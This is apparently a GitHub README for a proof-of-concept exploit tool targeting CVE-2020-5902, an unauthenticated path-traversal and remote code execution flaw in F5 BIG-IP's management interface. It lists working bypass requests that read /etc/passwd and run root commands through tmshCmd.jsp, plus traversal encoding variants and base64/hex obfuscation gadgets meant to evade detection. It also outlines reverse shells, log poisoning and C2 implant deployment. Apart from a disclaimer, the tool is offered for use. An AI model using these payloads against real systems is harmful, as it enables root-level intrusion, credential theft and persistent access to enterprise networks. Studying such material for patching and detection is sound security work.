O F5 BIG-IP é uma plataforma de entrega e segurança de aplicações amplamente utilizada em ambientes corporativos. A CVE-2020-5902 é uma vulnerabilidade crítica no TMUI que, em versões não corrigidas, pode permitir acesso não autorizado e execução remota de código, reforçando a necessidade de atualização e gestão contínua de vulnerabilidades.
Proof-of-Concept exploit for the critical path-traversal / remote code execution vulnerability in F5 BIG-IP's Traffic Management User Interface (TMUI).
⚠️ For authorized penetration testing and security research only. Unauthorized use against systems you do not own or have written permission to test is illegal. The author assumes no liability for misuse of this tool.
F5 BIG-IP is a family of multi-purpose network appliances (load balancers, WAFs, application delivery controllers) deployed in the majority of Fortune 500 companies, financial institutions, healthcare organizations, and government agencies worldwide. The Traffic Management User Interface (TMUI) — also referred to as the Configuration Utility — is the web-based management portal accessible on port 443 (or 8443).
In July 2020, F5 disclosed CVE-2020-5902, a Critical (CVSS 9.8) unauthenticated path-traversal vulnerability in TMUI that allows a remote, unauthenticated attacker to:
Within days of public disclosure, mass exploitation was observed in the wild, including by nation-state actors.
The TMUI is built on Apache Tomcat and uses a servlet filter to enforce authentication on protected resources. The vulnerability lies in how Tomcat parses semicolon-delimited path segments (;).
The following request bypasses authentication entirely:
GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
Why it works:
/tmui/login.jsp (ends before ;) — which is the public login page — and allows the request./..;/ as a path traversal (/../) before dispatching.fileRead.jsp servlet without authentication.┌──────────────────────────────────────────────────────────────────┐
│ Client Request │
│ GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp │
└────────────────────────────┬─────────────────────────────────────┘
│
┌───────────────▼───────────────┐
│ Tomcat Servlet Filter │
│ Sees: /tmui/login.jsp ✓ │
│ (public endpoint → ALLOW) │
└───────────────┬───────────────┘
│
┌───────────────▼───────────────┐
│ Tomcat URL Resolver │
│ Resolves: /..;/ → /../ │
│ Final path: /tmui/locallb/ │
│ workspace/fileRead.jsp ← 🔓 │
└───────────────┬───────────────┘
│
┌───────────────▼───────────────┐
│ fileRead.jsp (no auth check) │
│ Reads arbitrary files as root│
└───────────────────────────────┘
The tmshCmd.jsp servlet (also reachable via the same traversal) passes the command and utilCmdArgs parameters directly to tmsh (the BIG-IP management shell), which wraps run util bash -c '...'. This provides unauthenticated root-level OS command execution:
POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp
command=run+util+bash+-c+'id'&utilCmdArgs=-c+'id'
Phase 1: Reconnaissance
└─ TCP banner grab (HTTP/TLS fingerprint)
└─ SSL certificate analysis
└─ HTTP headers fingerprint (Server, X-Powered-By, Set-Cookie)
└─ BIG-IP version estimation from /etc/f5-release
Phase 2: Vulnerability Check
└─ Iterate over 6 traversal encoding variants
└─ Test against 4 known-readable sentinel files
└─ Confirm output matches known indicators (root:x:0:0, BIG-IP, etc.)
Phase 3: Exploitation
├─ Vector A: tmshCmd.jsp (primary RCE)
│ └─ Command obfuscated via base64 / hex-encode gadgets
├─ Vector B: fileRead.jsp + command injection in fileName param
│ └─ OS command injected into the fileName parameter
└─ Vector C: Log poisoning (User-Agent injection → read access_log)
Phase 4: Post-Exploitation (optional)
├─ Interactive shell (command REPL)
├─ Reverse shell (4 concurrent one-liners)
├─ LFI brute-force (30 sensitive paths, parallel)
└─ C2 implant deployment (Sliver / Metasploit / custom)
| Variant | Payload |
|---|---|
| Standard | tmui/login.jsp/..;/tmui/... |
| Encoded semicolon | tmui/login.jsp/..%3b/tmui/... |
| Double URL encode | tmui%2flogin.jsp%2f..%3b%2ftmui%2f... |
| Unicode dot-dot | tmui/login.jsp/%2e%2e;/tmui/... |
| Case variation | TMUI/login.jsp/..;/tmui/... |
| Directory confusion | tmui/login.jsp/..;/tmui/locallb/workspace/../workspace/... |
The tool applies one of two obfuscation gadgets per execution, making static signature detection harder:
# Gadget 1 — Base64 encode/decode pipeline
bash -c {echo,aWQ=}|{base64,-d}|bash
# Gadget 2 — Hex-byte printf evaluation
eval "$(printf '\x69\x64')"
| BIG-IP Branch | Vulnerable Range | Patched Version |
|---|---|---|
| 15.x | < 15.1.0.4 | ≥ 15.1.0.4 |
| 14.x | < 14.1.2.6 | ≥ 14.1.2.6 |
| 13.x | < 13.1.3.4 | ≥ 13.1.3.4 |
| 12.x | < 12.1.5.2 | ≥ 12.1.5.2 |
| 11.x | < 11.6.5.2 | ≥ 11.6.5.2 |
BIG-IQ, BIG-IQ Centralized Management, F5OS, and Traffix SDC are not affected by this specific CVE.
!revshell, !c2, !read, !brute commandsgit clone https://github.com/DevRafaelprogrammer/F5-BIG-IP.git
cd F5-BIG-IP
pip install requests pycryptodome urllib3
Requirements: Python 3.10+